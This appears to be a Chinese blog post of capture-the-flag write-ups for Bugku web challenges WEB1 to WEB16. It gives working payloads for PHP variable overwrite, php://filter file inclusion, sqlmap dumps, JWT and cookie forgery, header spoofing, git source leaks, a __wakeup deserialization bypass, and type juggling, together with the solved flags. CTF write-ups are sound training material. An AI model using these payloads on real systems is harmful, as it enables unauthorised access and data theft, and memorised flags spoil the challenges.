关于新Bugku的题解

发表于 分类于 阅读次数:

全是水题。

WEB1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
    header("Content-type:text/html;charset=utf-8");
    error_reporting(0);
    include 'flag.php';
    $b='ssAEDsssss';
    extract($_GET);
    if(isset($a)) {
        $c = trim(file_get_contents($b));
        if($a==$c) {
            echo $myFlag;
        } else {
            echo '继续努力,相信flag离你不远了';
        }
    }
?>

知识点是PHP变量覆盖漏洞

这里使用**extract($_GET)接收了GET请求中的数据,并将键名和键值转换为变量名和变量的值,然后再进行if条件判断,所以可以使用GET提交参数和值,利用extract()**对变量进行覆盖,从而满足各个条件。

因此payload?a=&b=,得到flag{c3fd1661da5efb989c72b91f3c378759}

WEB2

看了一下,大概是需要一个时间竞争,写个爬虫就行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# -*- coding: utf-8 -*-
import re
import requests
from bs4 import BeautifulSoup

url = 'http://123.206.31.85:10002/'

headers = {
    'Cookie': 'PHPSESSID=gss81c94di250qs94uq0c5vuhgas9q81',
    'Content-Type': 'application/x-www-form-urlencoded',
}

def getText():

    getResult = requests.get(url = url, headers = headers)
    return getResult.text

def getFlag(result):

    data = 'result=' + str(result)
    getResult = requests.post(url = url, data = data, headers = headers)
    return getResult.text

soup = BeautifulSoup(getText(), features="lxml")
cal = soup.find('p').get_text(strip=True).encode('utf-8')
cal = re.sub(r'[^\x00-\x7f]', '', cal)
cal = re.sub(r'[a-z]', '', cal)
res = BeautifulSoup(getFlag(eval(cal)), features="lxml")
print res.text

得到flag{b37d6bdd7bb132c7c7f6072cd318697c}

WEB3

寻思了许久的文件上传,然后发现其实是文件包含Orz

发现主页是?op=home,上传界面是?op=upload,然后试了一下?op=flag没报错,?op=1报错。

于是构造?op=php://filter/read=convert.base64-encode/resource=flag

得到flag{e00f8931037cbdb25f6b1d82dfe5552f}

WEB4

丢进sqlmap

1
python sqlmap.py -r "bugku.txt" --dbs

然后得到一个url,得到flag{7ae7de60f14eb3cbd9403a0c4328598d}

WEB5

丢进sqlmap

1
python sqlmap.py -u "http://47.95.208.167:10005/?mod=read&id=1" -D web5 -T flag -C flag --dump

得到flag{320dbb1c03cdaaf29d16f9d653c88bcb}

WEB6

Burpsuite爆破一下,admin/test123

得到flag{85ff2ee4171396724bae20c0bd851f6b}

WEB7

看了一下,cookie开头十位351e766803不知道什么意义,后面三十二位是MD5加密。

然后尝试了几次,把ur都填上351e76680321232f297a57a5a743894a0e4a801fc3

得到flag{98112cb20fb17cc81687115010f8a5c3}

WEB8

WEB9

根据提示,PUT一个bugku

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PUT / HTTP/1.1
Host: 123.206.31.85:3031
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: PHPSESSID=gg5i701sc080tdc1u5bdacmj509k3m6i
X-Forwarded-For: 127.0.0.1
Connection: close
Content-Length: 5

bugku

得到flag{T7l8xs9fc1nct8NviPTbn3fG0dzX9V}

WEB10

右键源代码看到一个Base32,解密后得到账号密码。

1
kk:kk123

登陆后提示说vim崩溃,故有源码泄露,L3yx.php.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
</form>NTER or type command to continue
<!--hint:NNVTU23LGEZDG===-->
</html>

<?php
    error_reporting(0);
    require_once 'src/JWT.php';

    const KEY = 'L3yx----++++----';

    function loginkk()
    {
        $time = time();
        $token = [
          'iss'=>'L3yx',
          'iat'=>$time,
          'exp'=>$time+5,
          'account'=>'kk'
        ];
        $jwt = \Firebase\JWT\JWT::encode($token,KEY);
        setcookie("token",$jwt);
        header("location:user.php");
    }

    if(isset($_POST['username']) && isset($_POST['password']) && $_POST['username']!='' && $_POST['password']!='')
    {
        if($_POST['username']=='kk' && $_POST['password']=='kk123')
        {
            loginkk();
        }
        else
        {
            echo "账号或密码错误";
        }
    }
?>

然后根据题意构造Jwt,修改accountL3yx以及加长exp的时间戳。

1
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJMM3l4IiwiaWF0IjoxNTQ5NzAyNTIyLCJleHAiOjE1NDk3MTA4MjYsImFjY291bnQiOiJMM3l4In0.jVsu0yPVFRViqY3RiQeQU6MAThXiSfgTJS0ysg3OLKY

然后得到flag{32ef489b73c4362ca6f28b7e7cf88368}

WEB11

依提示访问robots.txt,再指向shell.php,再根据题目写脚本。

1
2
3
4
5
for i in range(1, 100000):
    m2 = hashlib.md5()
    m2.update(str(i))
    if (m2.hexdigest()[0:6] == "af1042"):
        print i

得到flag{e2f86fb5f75da4999e6f4957d89aaca0}

WEB12

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<?php

    class Time{

        public $flag = "******************";
        public $truepassword = "******************";
        public $time;
        public $password;

        public function __construct($tt, $pp) {
            $this->time = $tt;
            $this->password = $pp;
        }

        function __destruct(){
            if(!empty($this->password))
            {
                if(strcmp($this->password,$this->truepassword)==0){
                    echo "<h1>Welcome,you need to wait......<br>The flag will become soon....</h1><br>";
                    if(!empty($this->time)){
                        if(!is_numeric($this->time)){
                            echo 'Sorry.<br>';
                            show_source(__FILE__);
                        }
                        else if($this->time < 11 * 22 * 33 * 44 * 55 * 66){
                            echo 'you need a bigger time.<br>';
                        }
                        else if($this->time > 66 * 55 * 44 * 33 * 23 * 11){
                            echo 'you need a smaller time.<br>';
                        }
                        else{
                            sleep((int)$this->time);
                            var_dump($this->flag);
                        }
                        echo '<hr>';
                    }
                    else{
                        echo '<h1>you have no time!!!!!</h1><br>';
                    }
                }
                else{
                    echo '<h1>Password is wrong............</h1><br>';
                }
            }
            else{
                echo "<h1>Please input password..........</h1><br>";
            }
        }

        function __wakeup(){
            $this->passwotd = 1;
            echo 'hello hacker,I have changed your password and time, rua!';
        }
    }


    if(isset($_GET['rua'])){
        $rua = $_GET['rua'];
        $a = unserialize($rua);
    }
    else{
        echo "<h1>Please don't stop rua 233333</h1><br>";
    }

?>

一题PHP反序列化,考点是**__wakeup方法的绕过【当成员属性数目大于实际数目时可绕过(CVE-2016-7124),**时间的几个判断使用十六进制绕过就行了。

因此构造payload如下。

1
?rua=O:4:"Time":6:{s:4:"time";s:10:"0x4c06f351";s:8:"password";a:1:{i:1;i:1;}}

得到flag

WEB13

看了一下,响应头里有个Base64编码的password

提交了一下提示太慢,只好上爬虫了。

1
2
3
4
5
6
7
8
9
10
import requests
import base64

url = "http://123.206.31.85:10013/index.php"
headers = {'Cookie':'PHPSESSID=gg5i701sc080tdc1u5bdacmj509k3m6i'}
re = requests.get(url = url, headers = headers)
password = base64.b64decode(re.headers['Password'])
data = {'password':password[5:-1]}
re = requests.post(url = url, headers = headers, data = data)
print re.content

得到flag{FjXAkdGnOBoIUZaFzHqjInY2VndLSg}

WEB14

考察了git源码泄露。

1
python GitHack.py http://123.206.31.85:10014/.git/

然后就有flag{GitIsAFreeVessionControlSyStem}

WEB15

根据提示,源码泄漏,扫到index.php~

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
    header('content-type:text/html;charset=utf-8');
    include './flag.php';
    error_reporting(0);
    if(empty($_GET['id'])){
        header('location:./1ndex.php');
    }else{
        $id = $_GET['id'];
        if (!is_numeric($id)) {
            $id = intval($id);
            switch ($id) {
                case $id>=0:
                    echo "快出去吧,走错路了~~~<br>";
                    echo "这么简单都不会么?";
                    break;
                case $id>=10:
                    exit($flag);
                    break;
                default:
                    echo "你走不到这一步的!";
                    break;
            }
        }
    }
?>

这里的case有错。

只要传入的参数为字符,经过函数intval转换后的结果就是为00>=0得到的结果是true,弱类型比较后第一个得到的结果是case 1:,因此得以绕过,到第二个0>=10的结果是false,弱类型比较后第二个的结果是case 0:,从而得到flag{Is_wh1te_ooo000oo0}

WEB16

翻了一下,发现三个JavaScript,一个是主函数,调用一个Base64MD5加密,主函数解密一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
function getCookie(cname) {
	var name = cname + "=";
	var ca = document.cookie.split(';');
	for (var i = 0; i < ca.length; i++) {
		var c = ca[i].trim();
		if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
	}
	return ""
}

function decode_create(temp) {
	var base = new Base64();
	var result = base.decode(temp);
	var result3 = "";
	for (i = 0; i < result.length; i++) {
		var num = result[i].charCodeAt();
		num = num ^ i;
		num = num - ((i % 10) + 2);
		result3 += String.fromCharCode(num)
	}
	return result3
}

function ertqwe() {
	var temp_name = "user";
	var temp = getCookie(temp_name);
	temp = decodeURIComponent(temp);
	var mingwen = decode_create(temp);
	var ca = mingwen.split(';');
	var key = "";
	for (i = 0; i < ca.length; i++) {
		if (-1 < ca[i].indexOf("flag")) {
			key = ca[i + 1].split(":")[2]
		}
	}
	key = key.replace('"', "").replace('"', "");
	document.write('<img id="attack-1" src="image/1-1.jpg">');
	setTimeout(function() {
		document.getElementById("attack-1").src = "image/1-2.jpg"
	}, 1000);
	setTimeout(function() {
		document.getElementById("attack-1").src = "image/1-3.jpg"
	}, 2000);
	setTimeout(function() {
		document.getElementById("attack-1").src = "image/1-4.jpg"
	}, 3000);
	setTimeout(function() {
		document.getElementById("attack-1").src = "image/6.png"
	}, 4000);
	setTimeout(function() {
		alert("你使用如来神掌打败了蒙老魔,但不知道是真身还是假身,提交试一下吧!flag{" + md5(key) + "}")
	}, 5000)
}